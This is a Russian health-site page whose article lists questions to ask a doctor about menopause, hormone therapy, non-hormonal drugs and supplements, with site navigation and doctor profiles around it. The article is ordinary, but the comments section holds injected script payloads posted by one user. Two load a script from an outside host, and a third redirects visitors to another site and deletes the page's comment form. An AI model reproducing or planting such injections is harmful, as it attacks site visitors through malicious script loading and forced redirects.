Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Врачи хотят поговорить с ...  >>  Врачи хотят поговорить с вами о сексе! А что спросить у них?
 
Обратная связь
 

Врачи хотят поговорить с вами о сексе! А что спросить у них?

Размер шрифта
15 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Собираетесь пойти к своему врачу и обсудить с ним вопросы, связанные с менопаузой? Тогда советуем вам распечатать эту страницу и взять с собой, ведь здесь собраны все основные вопросы, которые стоит задать. А это значит, что вы не упустите важных моментов в разговоре с врачом.

Врачи хотят поговорить с вами о сексе! А что спросить у них?

1) Могут ли мои симптомы быть вызваны каким-либо другим состоянием, а не менопаузой? (Будьте готовы подробно описать симптомы или, что еще лучше, ведите подробный дневник. Расскажите о характере симптомов, частоте, с которой они возникают, длительности, интенсивности, а также о том, что провоцирует их появление).

2) Какие препараты для контроля симптомов менопаузы мне стоит рассмотреть? Поможет ли изменение образа жизни уменьшить эти симптомы?

3) Если я решу начать гормональную терапию, какие преимущества и недостатки есть у каждой из лекарственных форм (таблетки, пластырь, крем и так далее)?

4) Какие побочные эффекты есть у гормональной терапии и как мое состояние здоровья и семейная история могут повлиять на мое решение принимать гормоны? Каковы риски?

5) Если я выберу один из негормональных рецептурных препаратов, которые применяют для лечения симптомов менопаузы (например, селективные ингибиторы захвата серотонина), то я хотела бы знать, подтверждена их эффективность?

6) Каковы побочные эффекты различных негормональных рецептурных препаратов, используемых для контроля симптомов менопаузы?

7) Есть ли научные исследования, которые подтверждают эффективность каких-либо трав или пищевых добавок для контроля симптомов менопаузы?

8) Какие травы или пищевые добавки обычно используются для лечения симптомов менопаузы (к примеру, приливов или болезненности при занятии сексом) и каковы их побочные эффекты? Каковы потенциальные риски такого лечения?

9) Могут ли травы или пищевые добавки взаимодействовать с препаратами, которые я принимаю на данный момент, и каковы будут последствия от их совместного приема?

10) Какие средства для контроля симптомов менопаузы я должна прекратить принимать перед операцией или другим медицинским вмешательством?

11) Нужно мне применять местные гормональные препараты (например, Овестин)?

К слову говоря, ответы на многие эти вопросы вы без труда найдете на страницах нашего специального проекта «Есть ли секс после 45»?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:10

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Правила секса в 30, 40, 50 лет   Как заниматься сексом, если болит спина?   Правила секса в 50 лет   Сексуальное белье не единственная возможность почувствовать себя женственной!  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 27 мая 2013Почему женщины толстеют после 45? Как этого избежать?
 

Слайдшоу

1
Счастье зрелой женщины Как научить мужа доставлять вам удовольствие в постели
Что каждая женщина должна знать о сексе! Часть 4 Как вернуть секс в вашу жизнь
Как оставаться сексуальной в 45 Сохраняя самое важное
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.